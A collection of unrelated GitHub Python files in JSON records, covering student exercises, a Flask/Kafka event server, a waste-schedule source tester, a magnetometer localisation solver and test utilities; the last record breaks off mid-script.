store_temporary_data(self, donor, secret_data):\n r = login_database.login_redis_cloud()\n r.set(donor, secret_data)\n\n\n def retrieve_temporary_data(self, donor):\n r = login_database.login_redis_cloud()\n return r.get(donor)\n\n\nmailroom = MailroomMongo()\n\n\nif __name__ == \"__main__\":\n isRunning = True\n\n while isRunning:\n choice = input(\"1.) Add donation\\n\"\n \"2.) Rename donor\\n\"\n \"3.) Delete donor\\n\"\n \"4.) Show donors\\n\"\n \"5.) Store temp data for donor\\n\"\n \"6.) Retrieve temp data for donor\\n\"\n \"Choice (q to quit):\" )\n\n if choice == 'q':\n isRunning = False\n elif choice == '1':\n add_donation()\n elif choice == '4':\n list_donations()\n elif choice == '2':\n rename_donor()\n elif choice == '3':\n delete_donor()\n elif choice == '5':\n store_secret()\n elif choice == '6':\n retrieve_secret()\n else:\n print (\"Bad input: {}\\n\".format(choice))\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/eric_rosko/lesson-08/src/mailroom_mongo.py","file_name":"mailroom_mongo.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2512455507","text":"\"\"\"\nExercício Python 011.\n\nFaça um programa que leia a largura e a altura de uma parede em metros, calcule\na sua área e a quantidade de tinta necessária para pintá-la, sabendo que cada\nlitro de tinta pinta uma área de 2 metros quadrados.\n\"\"\"\n\nlar = float(input('Largura da parede: '))\nalt = float(input('Altura da parede: '))\na = lar * alt\nprint('Sua parede tem a dimensão de {}x{} e sua área é de {}m².\\n'\n 'Para pintar esse parede, você precisará de {}lt de tinta.'\n .format(lar, alt, a, (a/2)))\n","repo_name":"gustavogattino/Curso-em-Video-Python","sub_path":"Exercicios/ex011.py","file_name":"ex011.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74146187948","text":"#!/usr/bin/env python3\n\nimport argparse\nimport datetime\nimport importlib\nimport re\nimport site\nimport traceback\nfrom pathlib import Path\n\nimport yaml\n\nSECRET_FILENAME = \"secrets.yaml\"\nSECRET_REGEX = re.compile(r\"!secret\\s(\\w+)\")\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Test sources.\")\n parser.add_argument(\n \"-s\", \"--source\", action=\"append\", help=\"Test given source file\"\n )\n parser.add_argument(\n \"-l\", \"--list\", action=\"store_true\", help=\"List retrieved entries\"\n )\n parser.add_argument(\n \"-i\", \"--icon\", action=\"store_true\", help=\"Show waste type icon\"\n )\n parser.add_argument(\"--sorted\", action=\"store_true\", help=\"Sort output by date\")\n parser.add_argument(\"--weekday\", action=\"store_true\", help=\"Show weekday\")\n parser.add_argument(\n \"-t\",\n \"--traceback\",\n action=\"store_true\",\n help=\"Print exception information and stack trace\",\n )\n parser.add_argument(\n \"-I\", \"--ics\", action=\"store_true\", help=\"Test all .yaml file for ICS source\"\n )\n parser.add_argument(\n \"-y\", \"--yaml\", action=\"append\", help=\"Test given .yaml file for ICS source\"\n )\n args = parser.parse_args()\n\n # read secrets.yaml\n secrets = {}\n try:\n with open(SECRET_FILENAME) as stream:\n try:\n secrets = yaml.safe_load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n except FileNotFoundError:\n # ignore missing secrets.yaml\n pass\n\n package_dir = Path(__file__).resolve().parents[2]\n source_dir = package_dir / \"waste_collection_schedule\" / \"source\"\n\n # add module directory to path\n site.addsitedir(str(package_dir))\n\n # find all source files for testing\n if args.source is not None:\n # source file(s) given\n source_files = args.source\n elif not args.ics and args.yaml is None:\n # no ICS yaml files given --> test all source files\n source_files = filter(\n lambda x: x != \"__init__\",\n map(lambda x: x.stem, source_dir.glob(\"*.py\")),\n )\n else:\n # ICS yaml file(s) given\n source_files = []\n\n for f in sorted(source_files):\n # iterate through all *.py files in waste_collection_schedule/source\n print(f\"Testing source {f} ...\")\n module = importlib.import_module(f\"waste_collection_schedule.source.{f}\")\n\n # get all names within module\n names = set(dir(module))\n\n # test if all mandatory names exist\n assert \"TITLE\" in names\n assert \"DESCRIPTION\" in names\n assert \"URL\" in names\n assert \"TEST_CASES\" in names\n\n # run through all test-cases\n for name, tc in module.TEST_CASES.items():\n # replace secrets in arguments\n replace_secret(secrets, tc)\n\n test_fetch(module, name, tc, args)\n\n # find all ICS yaml files for testing\n ics_yaml_dir = Path(__file__).resolve().parents[4] / \"doc\" / \"ics\" / \"yaml\"\n if args.ics:\n # test all ICS yaml files\n yaml_files = ics_yaml_dir.glob(\"*.yaml\")\n elif args.yaml:\n # ICS yaml files specified\n yaml_files = [Path(ics_yaml_dir, f).with_suffix(\".yaml\") for f in args.yaml]\n elif args.source is None:\n # neither source nor ICS yaml files specified --> test all yaml files\n yaml_files = ics_yaml_dir.glob(\"*.yaml\")\n else:\n # source files given --> don't test ICS yaml files\n yaml_files = []\n\n # run through all .yaml files for ICS source\n module = importlib.import_module(\"waste_collection_schedule.source.ics\")\n for f in sorted(yaml_files):\n print(f\"Testing ICS {f.stem}\")\n with open(f) as stream:\n # read yaml file\n data = yaml.safe_load(stream)\n\n # run through all test-cases\n for name, tc in data[\"test_cases\"].items():\n test_fetch(module, name, tc, args)\n\n\ndef test_fetch(module, name, tc, args):\n # create source\n try:\n source = module.Source(**tc)\n result = source.fetch()\n count = len(result)\n if count > 0:\n print(f\" found {bcolors.OKGREEN}{count}{bcolors.ENDC} entries for {name}\")\n else:\n print(f\" found {bcolors.WARNING}0{bcolors.ENDC} entries for {name}\")\n\n # test if source is returning the correct date format\n if len(list(filter(lambda x: type(x.date) is not datetime.date, result))) > 0:\n print(\n f\"{bcolors.FAIL} ERROR: source returns invalid date format (datetime.datetime instead of datetime.date?){bcolors.ENDC}\"\n )\n\n if args.list:\n result = sorted(result, key=lambda x: x.date) if args.sorted else result\n for x in result:\n icon_str = f\" [{x.icon}]\" if args.icon else \"\"\n weekday_str = x.date.strftime(\"%a \") if args.weekday else \"\"\n print(f\" {x.date.isoformat()} {weekday_str}: {x.type}{icon_str}\")\n except KeyboardInterrupt:\n exit()\n except Exception as exc:\n print(f\" {name} {bcolors.FAIL}failed{bcolors.ENDC}: {exc}\")\n if args.traceback:\n print(indent(traceback.format_exc(), 4))\n\n\ndef replace_secret(secrets, d):\n for key in d.keys():\n value = d[key]\n if isinstance(value, dict):\n replace_secret(secrets, value)\n elif isinstance(value, str):\n match = SECRET_REGEX.fullmatch(value)\n if match is not None:\n id = match.group(1)\n if id in secrets:\n d[key] = secrets[id]\n else:\n print(f\"identifier '{id}' not found in {SECRET_FILENAME}\")\n\n\ndef indent(s, count):\n indent = \" \" * count\n return \"\\n\".join([indent + line for line in s.split(\"\\n\")])\n\n\nclass bcolors:\n HEADER = \"\\033[95m\"\n OKBLUE = \"\\033[94m\"\n OKCYAN = \"\\033[96m\"\n OKGREEN = \"\\033[92m\"\n WARNING = \"\\033[93m\"\n FAIL = \"\\033[91m\"\n ENDC = \"\\033[0m\"\n BOLD = \"\\033[1m\"\n UNDERLINE = \"\\033[4m\"\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mampfes/hacs_waste_collection_schedule","sub_path":"custom_components/waste_collection_schedule/waste_collection_schedule/test/test_sources.py","file_name":"test_sources.py","file_ext":"py","file_size_in_byte":6102,"program_lang":"python","lang":"en","doc_type":"code","stars":559,"dataset":"github-code","pt":"37"} +{"seq_id":"74007920106","text":"\"\"\"\nauthor: buppter\ndatetime: 2019/9/12 9:26\n\"\"\"\n\n\nclass Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n max_len = 0\n sub = []\n for i in s:\n if i not in sub:\n sub.append(i)\n else:\n max_len = max(max_len, len(sub))\n sub = sub[sub.index(i) + 1:]\n sub.append(i)\n return max(max_len, len(sub))\n","repo_name":"buppter/algorithms","sub_path":"LeetCodeHot100/3_Longest_Substring_Without_Repeating_Characters.py","file_name":"3_Longest_Substring_Without_Repeating_Characters.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"22960915522","text":"\"\"\"\r\nAn object that represents a run\r\nAuthor: Andrew Jarombek\r\nDate: 9/20/2018\r\n\"\"\"\r\n\r\n\r\nclass Run:\r\n\r\n def __init__(self, miles=0, minutes=0, seconds=0):\r\n \"\"\"\r\n Construct a Run instance\r\n :param miles: the miles run. This parameter defaults to 0 if no argument is passed\r\n :param minutes: the minutes spent running. This parameter defaults to 0 if no argument\r\n is passed\r\n :param seconds: the seconds spent running. This parameter defaults to 0 if no argument\r\n is passed\r\n \"\"\"\r\n miles = miles if miles >= 0 else 0\r\n minutes = minutes if minutes >= 0 else 0\r\n seconds = seconds if seconds >= 0 else 0\r\n\r\n self.miles = miles\r\n self.minutes = minutes\r\n self.minutes += seconds // 60\r\n self.seconds = seconds % 60\r\n\r\n def __repr__(self):\r\n \"\"\"\r\n Special method used to get the string representation of an object. It is invoked by\r\n both print() and str() among others. This method is also a fallback from the __str__()\r\n special method\r\n :return: a String representation of the Run object\r\n \"\"\"\r\n seconds = str(self.seconds) if self.seconds >= 10 else '0%r' % self.seconds\r\n return '%r miles in %r:%s' % (self.miles, self.minutes, seconds)\r\n\r\n def __bool__(self):\r\n \"\"\"\r\n A special method used to check if the object is truthy or falsy. An object is falsy if\r\n all the miles, minutes, and seconds properties equal 0. Otherwise, it is truthy.\r\n :return: True if the object is truthy, False otherwise\r\n \"\"\"\r\n return self.miles > 0 or self.minutes > 0 or self.seconds > 0\r\n\r\n def __add__(self, other):\r\n \"\"\"\r\n A special method used with the addition operator (+). This method is invoked if two\r\n Run objects are added together.\r\n :param other: another object to add to this object\r\n :return: a new Run object with the two previous Run objects properties added together\r\n \"\"\"\r\n miles = self.miles + other.miles\r\n seconds = self.seconds + other.seconds\r\n minutes = seconds // 60\r\n seconds = seconds % 60\r\n minutes += self.minutes + other.minutes\r\n\r\n return Run(miles, minutes, seconds)\r\n\r\n def __lshift__(self, other):\r\n \"\"\"\r\n A special method used with the left shift operator (<<). This method is invoked if a\r\n Run object is left shifted with another object. NOTE: This method breaks the convention\r\n of using the left shift operator for a bitwise operation.\r\n :param other: another object to left shift with this object (should be a number)\r\n :return: a new Run object with the other object added to the miles run of the current\r\n Run object.\r\n \"\"\"\r\n new_mileage = self.miles + other\r\n new_mileage = new_mileage if new_mileage > 0 else 0\r\n\r\n return Run(new_mileage, self.minutes, self.seconds)\r\n","repo_name":"AJarombek/jarombek-com-sources","sub_path":"2018/09-Sep/9-24-python-data-model/Run.py","file_name":"Run.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32128271439","text":"import flask\nimport cgi\nimport json\nimport threading\nimport logging\nfrom queue import Queue\nfrom collections import defaultdict\nfrom kafka import KafkaConsumer\nfrom flask_cors import CORS, cross_origin\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\nlogging.getLogger('flask_cors').level = logging.DEBUG\nCORS(app, resources={r\"*\": {\"origins\": \"*\"}})\n\nclass EventsConsumer(object):\n def __init__(self, event_publisher):\n self.event_publisher = event_publisher\n self.consumer = KafkaConsumer(\n 'test',\n bootstrap_servers=['localhost:9092'],\n value_deserializer=lambda x: json.loads(x.decode('utf-8')))\n \n def listen(self):\n logging.info('starting the listen thread')\n for message in self.consumer:\n message = message.value\n self.event_publisher.emit_broadcast(message, message['external_tenant'])\n\n def start(self):\n '''\n create new thread to avoid blocking the flask server\n '''\n self.message_listenner = threading.Thread(target=self.listen, args=())\n self.message_listenner.start()\n \n \n\nclass EventPublisher(object):\n END_STREAM = {}\n def __init__(self):\n '''\n new event publisher for users\n initialize with empty list\n '''\n self.users_by_channel = defaultdict(list)\n \n def get_channel_users(self, channel='broadcast'):\n '''\n get list if users for specific channel\n '''\n return self.users_by_channel[channel]\n\n def emit_single_user(self, data, queue):\n \"\"\"\n Emits event only to a single user\n \"\"\"\n event_id = data[\"event\"]\n str_data = json.dumps(data)\n queue.put('event: ' + event_id)\n queue.put('\\n')\n queue.put('data: ' + str_data)\n queue.put('\\n\\n')\n\n def emit_broadcast(self, data, channel='broadcast'):\n '''\n global emitor for every connected user to a channel\n '''\n if callable(data):\n for queue, properties in self.get_channel_users(channel):\n value = data(properties)\n if value:\n self.emit_single_user(value, queue)\n else:\n for queue, _ in self.get_channel_users(channel):\n self.emit_single_user(data, queue)\n\n def join_channel(self, channel, properties=None, initial_data=[]):\n '''\n every user will be joined to the broadcast channel and custom one\n custom channel represents tenant \n '''\n queue = Queue()\n properties = properties or {}\n subscriber = (queue, properties)\n\n '''\n we can emit some initial events right after user subscribes to the event stream\n '''\n for data in initial_data:\n self.emit_single_user(data, queue)\n \n '''\n add user to channles\n '''\n self.users_by_channel['broadcast'].append(subscriber)\n self.users_by_channel[channel].append(subscriber)\n\n return self.generate_emittor(queue)\n \n def generate_emittor(self,queue):\n '''\n generates events until the END_STREAM is called\n '''\n while True:\n data = queue.get()\n if data is EventPublisher.END_STREAM:\n return\n yield data\n\n def close(self):\n '''\n closes all connections\n '''\n for channel in self.users_by_channel.values():\n for queue, _ in channel:\n queue.put(EventPublisher.END_STREAM)\n channel.clear()\n\n\nif __name__ == '__main__':\n event_publisher = EventPublisher()\n consumer = EventsConsumer(event_publisher)\n consumer.start()\n\n @app.route('/', methods=['GET'])\n def home():\n return flask.send_from_directory('./', 'index.html')\n \n @app.route('/subscribe', methods=['GET'])\n @cross_origin(origin='*')\n def subscribe():\n username = flask.request.args.get('username')\n channel = flask.request.args.get('channel')\n return flask.Response(event_publisher.join_channel(properties=username, channel=channel),\n content_type='text/event-stream')\n\n\n app.run(host=\"localhost\", port=5002, debug=True)","repo_name":"Hyperkid123/server-push-poc","sub_path":"sse-service/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70005540589","text":"import csv\r\n\r\nwith open(\"test_list.csv\") as csv_file:\r\n reader = csv.DictReader(csv_file)\r\n\r\n external_media = []\r\n archives_processing = []\r\n\r\n for row in reader:\r\n external_media.append(row['B'])\r\n # iterates thru values in column labeled B in csv and appends each to external_media list\r\n archives_processing.append(row['D'])\r\n # iterates thru values in column labeled D in csv and appends each to archives_processing list\r\n\r\n missing_files = [x for x in external_media if x not in archives_processing]\r\n # print(missing_files) will print values in shell\r\n \r\n with open('missing_files_list.csv', 'a', newline='') as output_csv:\r\n writer = csv.writer(output_csv, delimiter=',')\r\n for file in missing_files:\r\n writer.writerow([file])\r\n","repo_name":"alejandradean/digital_archiving","sub_path":"match_list_to_csv.py","file_name":"match_list_to_csv.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"41895497275","text":"import setuptools\n\nname = 'travel assistant'\nversion = '1.0'\n\nsetuptools.setup(\n author='x73495, Moreez317, senzaw',\n command_options={\n 'build_sphinx': {\n 'project': ('setup.py', name),\n 'version': ('setup.py', version),\n }\n },\n description='Помощник для путешествий между Россией и Германией',\n name=name,\n package_dir={\"\": \"src\"},\n packages=setuptools.find_packages(where=\"src\"),\n python_requires='>=3.7',\n url='https://github.com/x73495/travel-assistant',\n version=version\n)\n","repo_name":"73495/mirea-s4-trpp","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28774121190","text":"#import subprocess as sub\nimport os \nimport functions as fun \nimport sys\n\n#En este archivo lo usare para crear todas la opciones y parametros\n#que tendra el programa \n\n#Esta divido en 2 codicionales\n#si los argumentos son 4, contando el nombre del script y\n#si los argumentos son 3, contando el nombre del script\n#-s --save y -r --repo <-- para aguardar el programa \n#-d --del y -r --repo <-- para borrarlo \n#para listar los programas aguardados solo se usara 3 parametros\n#especificando el origen del programa, si viene de los repositorios si vienede los paquetes snap. \n\n\n#Guardar las opciones en una lista, hace que escriba menos codigo\narguments = [ [\"-s\",\"--save\"], [\"-d\", \"--del\"], [\"-r\",\"--repo\"],[\"-l\", \"--list\" ] ]\n\n#ocupamos usar la ruta absoluta de cualquier arhivo para poder usar el script desde cualquiera parte de\n#de la terminal, osea agregar el archivo del proyecto como variable de entorno para que nos permita usarlo \nfilePath = \"/home/linux/terminal_project/repo_programs.txt\"\n\n\n\nif len(sys.argv) == 4: #cantidad de argumentos de terminal\n op1 = sys.argv[1] #option\n op2 = sys.argv[2] #option\n pr = sys.argv[3] #program ( esta condiciones son para cuando los programas vengan de los repositorios)\n\n\n if (op1 in arguments[0]) and (op2 in arguments[2]): #add a program to the selected list-------\n if not fun.is_installed(pr):\n print(\"The program in not installed.\")\n exit() \n elif fun.in_the_file(filePath, pr):\n print(\"The program is in the file.\")\n exit()\n else:\n #si no se cumple ninguna de las condiciones anteriores, el programa se guardara\n fun.add_to_file(filePath, pr, True)\n print(\"The program is saved.\") \n exit()\n elif (op1 in arguments[1]) and (op2 in arguments[2]): #delete a program from the list---------\n if (not fun.in_the_file(filePath, pr) ):\n print(\"The program you want to remove is not in the file.\")\n exit()\n else:\n fun.del_from_file(filePath, pr) \n print(\"The program is removed from your list.\")\n exit()\n exit\n\nelif len(sys.argv) == 3: \n op1 = sys.argv[1] #Option\n pr = sys.argv[2] #name of the origin of the program\n \n if (op1 in arguments[3]) and (pr == \"repo\"): #list the programs in the specified archive--------\n fun.list_programms(filePath)\n exit() \n else:\n print(\"Error: parametros no reconocidos.\") \n\nelse:\n print(\"-Error: parametros incorrectos.\") \n exit() \n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"DanielIsaias/savepro","sub_path":"savepro.py","file_name":"savepro.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71856026668","text":"from climate_type import ClimateData\nfrom season_data import SEASON_AUTUMN, SEASON_WINTER, SEASON_SPRING, SEASON_SUMMER, SEASON_CONSTANT\n\nCLIMATE_TEMPERATE_KEY = \"temperate\"\nCLIMATE_TEMPERATE = ClimateData(\n name=CLIMATE_TEMPERATE_KEY,\n description=\"Temperate climates are found in the middle latitudes, between the polar and tropical regions. These climates have four seasons, with warm summers and cold winters.\",\n seasons=[SEASON_SPRING, SEASON_AUTUMN, SEASON_SUMMER, SEASON_WINTER],\n minimum_temperature=-5,\n maximum_temperature=80)\n\nCLIMATE_DESERT_KEY = \"desert\"\nCLIMATE_DESERT = ClimateData(\n name=CLIMATE_DESERT_KEY,\n description=\"Desert climates are found in the polar regions. These climates have two seasons, with hot summers and warm winters.\",\n seasons=[SEASON_SUMMER, SEASON_WINTER],\n minimum_temperature=-10,\n maximum_temperature=130)\n\nCLIMATE_TROPICAL_KEY = \"tropical\"\nCLIMATE_TROPICAL = ClimateData(\n name=CLIMATE_TROPICAL_KEY,\n description=\"Tropical climates are found in the tropical regions. These climates have two seasons, with hot summers and wet winters.\",\n seasons=[SEASON_SUMMER, SEASON_WINTER],\n minimum_temperature=60,\n maximum_temperature=110)\n\nCLIMATE_ALPINE_KEY = \"alpine\"\nCLIMATE_ALPINE = ClimateData(\n name=CLIMATE_ALPINE_KEY,\n description=\"Alpine climates are found in the polar regions. These climates have two seasons, with warm summers and cold winters.\",\n seasons=[SEASON_SPRING, SEASON_AUTUMN, SEASON_SUMMER, SEASON_WINTER],\n minimum_temperature=-10,\n maximum_temperature=70)\n\nCLIMATE_POLAR_KEY = \"polar\"\nCLIMATE_POLAR = ClimateData(\n name=CLIMATE_POLAR_KEY,\n description=\"Polar climates are found in the polar regions. These climates have two seasons, with cold summers and even colder winters.\",\n seasons=[SEASON_SUMMER, SEASON_WINTER],\n minimum_temperature=-40,\n maximum_temperature=30)\n\nCLIMATE_TUNDRA_KEY = 'tundra'\nCLIMATE_TUNDRA = ClimateData(\n name=CLIMATE_TUNDRA_KEY,\n description=\"Tundra climates are found in the polar regions. These climates have two seasons, with cool summers and cold winters.\",\n seasons=[SEASON_SUMMER, SEASON_WINTER],\n minimum_temperature=-30,\n maximum_temperature=50)\n\nCLIMATE_SUBTERRANEAN_KEY = \"subterranean\"\nCLIMATE_SUBTERRANEAN = ClimateData(\n name=CLIMATE_SUBTERRANEAN_KEY,\n description=\"Subterranean climates are found in the polar regions. There are generally no seasons, with a constant temperature.\",\n seasons=[SEASON_CONSTANT],\n minimum_temperature=30,\n maximum_temperature=70)\n\nCLIMATES_DB = [CLIMATE_TEMPERATE, CLIMATE_DESERT, CLIMATE_TROPICAL, CLIMATE_ALPINE, CLIMATE_POLAR, CLIMATE_SUBTERRANEAN, CLIMATE_TUNDRA]\n","repo_name":"JustinLloyd/banderschnappen","sub_path":"climate_data.py","file_name":"climate_data.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"784106297","text":"import os\nimport shutil\nimport sys\n\nimport yaml\n\nfrom lsst.cm.tools.core import panda_utils\nfrom lsst.cm.tools.core.handler import Handler\nfrom lsst.cm.tools.core.utils import LevelEnum, StatusEnum\nfrom lsst.cm.tools.db.sqlalch_interface import SQLAlchemyInterface\n\n\ndef test_error_handling() -> None:\n try:\n os.unlink(\"test_error_handling.db\")\n except OSError: # pragma: no cover\n pass\n os.system(\"\\\\rm -rf archive_test\")\n\n iface = SQLAlchemyInterface(\"sqlite:///test_error_handling.db\", echo=False, create=True)\n Handler.plugin_dir = \"examples/handlers/\"\n Handler.config_dir = \"examples/configs/\"\n os.environ[\"CM_CONFIGS\"] = Handler.config_dir\n\n iface.load_error_types(\"examples/configs/error_code_decisions.yaml\")\n\n assert iface.match_error_type(\"taskbuffer, 102\", \"expired in pending. status unchanged\") is not None\n\n iface.modify_error_type(\"expired_in_pending\", diagnostic_message=\"expired in pending. status peachy\")\n\n assert iface.match_error_type(\"taskbuffer, 102\", \"expired in pending. status unchanged\") is None\n\n assert iface.match_error_type(\"taskbuffer, 102\", \"expired in pending. status peachy\") is not None\n\n\ndef test_error_matching() -> None:\n try:\n os.unlink(\"test_error.db\")\n except OSError: # pragma: no cover\n pass\n shutil.rmtree(\"archive_requeue\", ignore_errors=True)\n\n iface = SQLAlchemyInterface(\"sqlite:///test_error.db\", echo=False, create=True)\n Handler.plugin_dir = \"examples/handlers/\"\n Handler.config_dir = \"examples/configs/\"\n os.environ[\"CM_CONFIGS\"] = Handler.config_dir\n\n config_name = \"test_errors\"\n config_yaml = \"example_config.yaml\"\n\n top_db_id = None\n iface.insert(top_db_id, None, None, production_name=\"example\")\n db_p_id = iface.get_db_id(production_name=\"example\")\n config = iface.parse_config(config_name, config_yaml)\n\n iface.insert(\n db_p_id,\n \"campaign\",\n config,\n production_name=\"example\",\n campaign_name=\"test\",\n butler_repo=\"repo\",\n lsst_version=\"dummy\",\n prod_base_url=\"archive_errors\",\n )\n\n db_c_id = iface.get_db_id(production_name=\"example\", campaign_name=\"test\")\n\n step_name = \"step1\"\n db_s_id = iface.get_db_id(production_name=\"example\", campaign_name=\"test\", step_name=step_name)\n iface.queue_jobs(LevelEnum.campaign, db_c_id)\n iface.launch_jobs(LevelEnum.campaign, db_c_id, 100)\n db_g_id = iface.get_db_id(\n production_name=\"example\",\n campaign_name=\"test\",\n step_name=step_name,\n group_name=\"group_4\",\n )\n db_w_id = iface.get_db_id(\n production_name=\"example\",\n campaign_name=\"test\",\n step_name=step_name,\n group_name=\"group_4\",\n workflow_idx=0,\n )\n iface.fake_run(LevelEnum.group, db_g_id, StatusEnum.reviewable)\n iface.fake_run(LevelEnum.step, db_s_id)\n iface.set_job_status(LevelEnum.step, db_w_id, \"job\", 0, StatusEnum.failed)\n\n with open(\"examples/errors.yaml\", \"r\") as error_file:\n errors_aggregate = yaml.safe_load(error_file)\n\n iface.commit_errors(5, errors_aggregate)\n panda_utils.print_errors_aggregate(sys.stdout, errors_aggregate)\n\n status_list = [\"done\", \"done\", \"finished\", \"finished\"]\n max_pct_failed = {152029: 0.001, 152185: 0.001}\n status = panda_utils.decide_panda_status(iface, status_list, errors_aggregate, max_pct_failed)\n assert status\n\n iface.load_error_types(\"examples/configs/error_code_decisions.yaml\")\n iface.rematch_errors()\n iface.report_errors(sys.stdout, LevelEnum.step, db_s_id)\n iface.report_error_trend(sys.stdout, \"kron_kron\")\n\n\nif __name__ == \"__main__\":\n test_error_matching()\n","repo_name":"lsst-dm/cm_tools","sub_path":"tests/test_error_handling.py","file_name":"test_error_handling.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31311611581","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom lmfit import Parameters, minimize, report_fit, Minimizer\nimport time\nimport scipy\n\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n\nu0 = 4 * np.pi * 1e-7 # const permeability of vacuum\n\n\ndef VecM(params, j): # calculate vector Mj\n theta, phy, M = params['theta{}'.format(\n j)], params['phy{}'.format(j)], params['m{}'.format(j)]\n # convert the M, theta and phy to its limited range\n theta = np.pi * sigmoid(theta)\n # theta = np.pi*np.tanh(theta)\n phy = np.pi * np.tanh(phy)\n M = np.exp(M)\n return 1e-7 * M * np.array([np.sin(theta) * np.cos(phy),\n np.sin(theta) * np.sin(phy),\n np.cos(theta)])\n\n\ndef VecB(params, pSensor, i=0, j=0): # calculate Bij\n x, y, z = params['X{}'.format(j)], params['Y{}'.format(\n j)], params['Z{}'.format(j)]\n # the position of the sensor i\n xs, ys, zs = pSensor[i, 0], pSensor[i, 1], pSensor[i, 2]\n vecR = np.stack([xs - x, ys - y, zs - z]).reshape(3, 1)\n vecM = VecM(params, j).reshape(3, 1)\n dis = np.linalg.norm(vecR, 2)\n vecb = 3 * np.matmul(vecR, (np.matmul(vecM.T, vecR))) / \\\n np.power(dis, 5) - vecM / np.power(dis, 3)\n return vecb\n\n# Calculate the residual of x, y, z\n\n\ndef objective(params, data, pSensor, mag_count):\n \"\"\"Calculate total residual for fits of Gaussians to several data sets.\"\"\"\n ndata, _ = data.shape\n resid = np.zeros_like(data)\n # make residual per data set\n\n for i in range(ndata):\n G = np.array([params['gx'], params['gy'], params['gz']]).reshape(3, 1)\n M = G\n for j in range(mag_count):\n tmp = VecB(params, pSensor, i, j)\n M += tmp\n resid[i] = data[i] - M.flatten() * 1e6\n # now flatten this to a 1D array, as minimize() needs\n tmp = resid.flatten()\n # tmp = np.sum(np.power(tmp, 2))\n return tmp\n\n\nclass Solver:\n def __init__(self, mag_count=1, p1=-0.04, p2=0.04, p3=0.04):\n self.fit_params = Parameters()\n self.mag_count = mag_count\n self.fit_params.add('gx', value=0)\n self.fit_params.add('gy', value=0)\n self.fit_params.add('gz', value=0)\n for i in range(mag_count):\n self.fit_params.add('X{}'.format(i), value=p1)\n self.fit_params.add('Y{}'.format(i), value=p2)\n self.fit_params.add('Z{}'.format(i), value=p3)\n self.fit_params.add('m{}'.format(i), value=np.log(2), vary=True)\n self.fit_params.add('theta{}'.format(i), value=0.2)\n self.fit_params.add('phy{}'.format(i), value=0)\n\n def solve(self, data, pSensor, builtin=False):\n if builtin:\n data = np.array([\n [-102.15, 12.01, -135.52],\n [-324.49, 78.12, -377.52],\n [-727.09, 84.12, -406.56],\n [-390.59, 660.99, 174.24]\n ])\n data = np.concatenate([data, data, data], axis=0)\n # Sensor position\n pSensor = 1e-2 * np.array([\n [0, -4.4, 0],\n [0, 0, 0],\n [0, 4.4, 0],\n [-4.5, 0, 0]\n ])\n pSensor = np.concatenate([pSensor, pSensor, pSensor], axis=0)\n\n t0 = time.time()\n out = minimize(objective, self.fit_params,\n args=(data, pSensor, self.mag_count), method='leastsq')\n # out = Minimizer.leastsq(objective, self.fit_params,\n # args=(data, pSensor))\n # self.fit_params['X'] = out.params['X']\n # self.fit_params['Y'] = out.params['Y']\n # self.fit_params['Z'] = out.params['Z']\n self.fit_params = out.params\n # self.fit_params['theta'].value = np.random.randn()\n # self.fit_params['phy'].value = np.random.randn()\n print(time.time() - t0)\n # report_fit(out.params)\n return out.params\n\n\nif __name__ == \"__main__\":\n tmp = Solver()\n data = np.array([\n [78.11, -210.31, 24.20],\n [351.52, -423.63, -183.92],\n [859.29, -120.18, -706.64],\n [-93.14, -688.03, -445.28]\n ])\n pSensor = 1e-2 * np.array([\n [0, -4.4, 0],\n [0, 0, 0],\n [0, 4.4, 0],\n [-4.5, 0, 0]\n ])\n out = tmp.solve(data, pSensor, False)\n report_fit(out)\n","repo_name":"dychen24/magx","sub_path":"Codes/optimization/src/solver/Senor1Mag4.py","file_name":"Senor1Mag4.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"44988639505","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\n\nimport erppeek\nimport dbconfig\n\nimport time\nfrom yamlns import namespace as ns\nimport sys\nfrom consolemsg import step, error, warn, success\n\n\nnregistres = sys.argv[1] if len(sys.argv)>1 else 100\n\n\nstep(\"Connectant a {server}\",**dbconfig.erppeek)\nt0 = time.time()\nerp = erppeek.Client(**dbconfig.erppeek)\n\nsuccess(\"Establir connexió: {}\", time.time()-t0)\n\nt0 = time.time()\n\nusers = erp.ResPartner.read(range(100),[])\n\nsuccess(\"Llegir {} Partners {}\",nregistres, time.time()-t0)\n\nt0 = time.time()\ncontracts = 